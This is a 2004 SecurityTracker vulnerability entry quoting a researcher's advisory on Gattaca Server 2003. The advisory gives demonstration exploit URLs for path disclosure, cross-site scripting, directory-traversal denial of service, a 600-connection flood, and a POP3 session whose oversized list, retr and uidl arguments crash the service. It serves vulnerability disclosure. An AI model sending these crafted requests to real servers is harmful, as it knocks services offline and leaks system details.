SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


Try our Premium Alert Service
 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service





Category:   Application (E-mail Server)  >   Gattaca Server Vendors:   GeeOS Team
Gattaca Server Multiple Input Validation Bugs Let Remote Users Deny Service, Determine System Information, and Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1010703
SecurityTracker URL:  http://securitytracker.com/id/1010703
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 15 2004
Impact:   Denial of service via network, Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): Gattaca Server 2003 (1.1.10.0)
Description:   Several vulnerabilities were reported in Gattaca Server 2003. A remote user can cause the server to crash. A remote user can also determine the installation path and the web root directory. A remote user can conduct cross-site scripting attacks.

Dr_insane reported that the 'web.tmpl' script does not properly validate user-supplied input in the 'language' and 'template' parameters. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Gattaca Server software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[code]//[code]
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=[code]//[code]&LANGUAGE=lang//en

It is also reported that a remote user can determine the installation path by sending a null byte HTTP request to the target server. A demonstration exploit URL is provided:

http://[host]/%00

It is reported that the server does not properly respond to invalid user-supplied input in the 'language' parameter. A remote user can exploit this to determine the web root directory. A demonstration exploit URL is provided:

http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[whatever]

A remote user can also exploit this by supplying a specially crafted HTTP request to cause the CPU utilitzation to reach 100% on the target system and cause the web service to become unavailable.

Some demonstration exploit URLs are provided:

http://[host]/index.tmpl?HELPID=1000&TEMPLATE=skins//water&LANGUAGE=/
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=.
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=\
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//[whatever]&LANGUAGE=lang//en

It is also reported that a remote user can open approximately 600 connections to the target server on TCP port 25 or 110 to cause the server to crash.

Finally, it is reported that a remote authenticated user can issue certain list, retr, and uidl POP3 commands to cause the Gattaca service to crash. Some demonstration exploit values are provided:

list 99999999999999999999999
retr 99999999999999999999999
uidl 98409583490583409539405

The original advisory is available at:

http://members.lycos.co.uk/r34ct/main/Gattaca%20Server%202003.txt

Impact:   A remote user or a remote authenticated user can cause the service to crash.

A remote user can also determine the installation path and the web root directory.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Gattaca software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.gattaca-server.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  http://members.lycos.co.uk/r34ct/main/Gattaca%20Server%202003.txt


http://members.lycos.co.uk/r34ct/main/Gattaca%20Server%202003.txt



  				www.r34ct.tk

      			      Security Advisory


Advisory Name: Gattaca Server 2003 (1.1.10.0)
  Release Date: 07/15/2004
   Application: Gattaca Server 2003 (1.1.10.0)
      Platform: Windows XP/NT
      Severity: Medium
      Author: dr_insane (dr_insane@pathfinder.gr)


Description:
A high performance Windows NT based Mail and Web Server software for building own 
intranet. You may
register unlimited users, use unlimited domains. Supporting POP3, SMTP, and HTTP 
protocols. Integrated
with TMPL library, allow you write own CGI scripts.
Multiple vulnerabilities have been identified in Gattaca server 2003 that may allow a 
remote attacker
to compromise a remote system.


Details:

Issue #1: Installation path exposure

A malicious user can gain knowledge of the installation path by sending a null byte to the 
server.

example: http://[host]/%00

Output:
--------------------------------------------------------------------------------
(X)TMPL error
File [C:\Program Files\Gattaca Server\doc\webadmin\index.cgi] not found or invalid
Virtual Host at C:\Program Files\Gattaca Server\doc\webadmin\
--------------------------------------------------------------------------------


Issue #2: WWW-root path exposure

There is a second vulnerability that can be used to reveal the WWw root directory.Input 
passed to the "Language"
parameter in certain scripts isn't properly sanitised before being returned to the user.

example: http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[whatever]

Output:
(X)TMPL error
File /whatever/_head.tmpl not found or invalid
Virtual Host at C:\GeeOSPub\wwwroot\
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
(X)TMPL error
File /whatever/web.tmpl not found or invalid
Virtual Host at C:\GeeOSPub\wwwroot\
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
(X)TMPL error
File /whatever/_foot.tmpl not found or invalid
Virtual Host at C:\GeeOSPub\wwwroot\
--------------------------------------------------------------------------------

Issue #3: Denial of Service attack

The third issue is a denial of service attack that can be used to to slow a remote system. 
The CPU usage
will hit 100% and the server will become unavailable.

Examples:
http://[host]/index.tmpl?HELPID=1000&TEMPLATE=skins//water&LANGUAGE=/
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=.
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=\
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//[whatever]&LANGUAGE=lang//en

issue #4: Cross site scripting injection

Another vulnerability has been found in Gattaca server , which can be exploited by 
malicous people to conduct XSS attacks.
This can be exploited by creating a malicious link including script code, which will be 
executed in a user's browser when
the link is clicked or a malicious web site is visited. Successful exploitation may result 
in disclosure of various
information (eg. cookie-based authentication information) associated with the site running 
OmniHTTPd or inclusion of
malicious content, which the user thinks is part of the real website.

examples:
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[code]//[code]
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=[code]//[code]&LANGUAGE=lang//en


issue #5: Denial of service attack [2]
Gattacca Server fails to handle multiple open connections on ports 25/tcp and 110/tcp. By 
establishing about 600
connections on port 25 or port 110 the server will crash.


issue #6: Denial of service attack [3] - message handling

By connecting and authenticating on POP3 service a remote user can crash Gattaca service. 
There are multiple problems
in the way the servers handles the commands list, retr and uidl.

example:
C:\>telnet r34ct-krew 110
+OK GeeOS/1.1 POP3 Server ver 1.0, ready :-).<3824.50a943410378@pomonis>
user test
+OK User name accepted, password please :-|
pass w
+OK GeeOS mail box open ;-)
list 99999999999999999999999
retr 99999999999999999999999
uidl 98409583490583409539405

The commands above will crash the server. An error message will be generate:
"Unhandled exception in: geeosserv.exe (TMAIL.DLL):0x0000005: access violation.

-------------snip---------------
0037A382   or          eax,eax
0037A384   je          0037A4C5
0037A38A   mov         edi,eax
0037A38C   shl         edi,4
0037A38F   cmp         dword ptr [ebp+edi-7624h],0FFh
0037A397   je          0037A46F
0037A39D   mov         edi,eax
0037A39F   shl         edi,4
0037A3A2   cmp         byte ptr [ebp+edi-762Ch],0
0037A3AA   je          0037A416
0037A3AC   mov         edi,eax
0037A3AE   mov         esi,edi
0037A3B0   shl         esi,4
------------snip----------------

Workaround:
Use another product


Credit:
Dr_insane
Http://members.lycos.co.uk/r34ct/


Feedback
Please send your comments to: dr_insane@pathfinder.gr


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2018, SecurityGlobal.net LLC